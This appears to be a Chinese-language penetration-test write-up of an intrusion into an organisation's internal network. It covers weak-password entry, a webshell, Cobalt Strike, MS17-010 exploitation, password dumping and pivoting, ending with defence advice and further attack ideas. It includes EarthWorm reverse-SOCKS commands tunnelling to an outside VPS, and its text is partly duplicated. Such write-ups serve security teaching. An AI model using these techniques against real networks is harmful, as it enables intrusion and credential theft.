某站点的测试
字数 1204 2025-08-05 08:18:04

内网渗透测试实战教学文档

1. 初始入侵阶段

1.1 目标发现与初始访问

  • 攻击向量:通过弱口令成功登录后台
  • 利用方式:通过部署包实现getshell
  • 权限获取:直接获得system权限
  • 网络配置:3389端口开放,无WAF防护

1.2 工具使用

  • Cobalt Strike (CS):用于建立持久化控制
  • 密码读取:成功获取系统密码
  • 代理设置
    E:\ew_for_Win.exe -s rssocks -d vps -e 33333
    ./ew_for_linux64 -s rcsocks -l 22222 -e 33333 &
    

2. 内网信息收集

2.1 网络拓扑发现

  • 内网IP段:192.168.10.x 和 192.168.11.x
  • 设备类型
    • 域成员机器 (RSGROUP)
    • 工作组机器 (WORKGROUP)
    • 未命名设备 (-no name-)

2.2 关键设备识别

  • 数据库服务器:192.168.10.35 (IMOTION-DB)
  • 主服务器:192.168.10.36 (NRCS-MAIN)
  • 备份服务器:192.168.10.37 (NRCS-BACKUP)
  • 广播服务器:192.168.10.20 (BROADCAST)

3. 横向移动技术

3.1 漏洞利用

  • MS17-010 (永恒之蓝)
    • 成功攻陷192.168.10.202
    • 发现但未成功利用的漏洞目标:
      • 172.23.3.100 (Windows Server 2008 R2)
      • 172.23.3.122 (Windows Server 2008 Enterprise)

3.2 密码重用攻击

  • 从已攻陷机器抓取密码
  • 尝试在内网其他机器上进行密码碰撞

3.3 网络跳板策略

  • 192.168.10.36:双网卡但与其他网段不互通
  • 192.168.10.202:不出网但可访问多个内网网段

4. 内网服务扫描

4.1 Web服务发现

  • 发现网管系统,可查看网络结构
  • 未发现可利用的Web漏洞

4.2 数据库信息

  • 发现SQL Server实例:
    /* 6 ธันวาคม 255917:31:51 
    User: sa 
    Server: RSFEED03 
    Database: BEAsset 
    Application: */
    

5. 渗透测试总结

5.1 成果

  • 完全控制3台内网机器
  • 绘制部分内网拓扑结构
  • 获取多组凭证信息

5.2 受限因素

  • 部分机器不出网
  • 某些网段间网络隔离
  • 高价值目标防护较强

6. 防御建议

  1. 密码策略:禁用弱口令,强制复杂密码
  2. 补丁管理:及时修复MS17-010等高危漏洞
  3. 网络隔离:合理划分VLAN,限制横向通信
  4. 监控措施:部署EDR/XDR检测横向移动行为
  5. 权限控制:限制system权限使用,实施最小权限原则

7. 工具清单

  • Cobalt Strike (C2框架)
  • ew (EarthWorm内网穿透工具)
  • MS17-010利用工具
  • 内网扫描工具(Nmap等)
  • 密码抓取工具(Mimikatz等)

8. 后续攻击思路

  1. 针对数据库服务器(192.168.10.35)进行深入渗透
  2. 尝试从备份服务器(192.168.10.37)获取备份数据
  3. 通过已控机器作为跳板,探索172.x.x.x网段
  4. 尝试域渗透技术(如Kerberoasting等)
内网渗透测试实战教学文档 1. 初始入侵阶段 1.1 目标发现与初始访问 攻击向量 :通过弱口令成功登录后台 利用方式 :通过部署包实现getshell 权限获取 :直接获得system权限 网络配置 :3389端口开放,无WAF防护 1.2 工具使用 Cobalt Strike (CS) :用于建立持久化控制 密码读取 :成功获取系统密码 代理设置 : 2. 内网信息收集 2.1 网络拓扑发现 内网IP段 :192.168.10.x 和 192.168.11.x 设备类型 : 域成员机器 (RSGROUP) 工作组机器 (WORKGROUP) 未命名设备 (-no name-) 2.2 关键设备识别 数据库服务器 :192.168.10.35 (IMOTION-DB) 主服务器 :192.168.10.36 (NRCS-MAIN) 备份服务器 :192.168.10.37 (NRCS-BACKUP) 广播服务器 :192.168.10.20 (BROADCAST) 3. 横向移动技术 3.1 漏洞利用 MS17-010 (永恒之蓝) : 成功攻陷192.168.10.202 发现但未成功利用的漏洞目标: 172.23.3.100 (Windows Server 2008 R2) 172.23.3.122 (Windows Server 2008 Enterprise) 3.2 密码重用攻击 从已攻陷机器抓取密码 尝试在内网其他机器上进行密码碰撞 3.3 网络跳板策略 192.168.10.36 :双网卡但与其他网段不互通 192.168.10.202 :不出网但可访问多个内网网段 4. 内网服务扫描 4.1 Web服务发现 发现网管系统,可查看网络结构 未发现可利用的Web漏洞 4.2 数据库信息 发现SQL Server实例: 5. 渗透测试总结 5.1 成果 完全控制3台内网机器 绘制部分内网拓扑结构 获取多组凭证信息 5.2 受限因素 部分机器不出网 某些网段间网络隔离 高价值目标防护较强 6. 防御建议 密码策略 :禁用弱口令,强制复杂密码 补丁管理 :及时修复MS17-010等高危漏洞 网络隔离 :合理划分VLAN,限制横向通信 监控措施 :部署EDR/XDR检测横向移动行为 权限控制 :限制system权限使用,实施最小权限原则 7. 工具清单 Cobalt Strike (C2框架) ew (EarthWorm内网穿透工具) MS17-010利用工具 内网扫描工具(Nmap等) 密码抓取工具(Mimikatz等) 8. 后续攻击思路 针对数据库服务器(192.168.10.35)进行深入渗透 尝试从备份服务器(192.168.10.37)获取备份数据 通过已控机器作为跳板,探索172.x.x.x网段 尝试域渗透技术(如Kerberoasting等)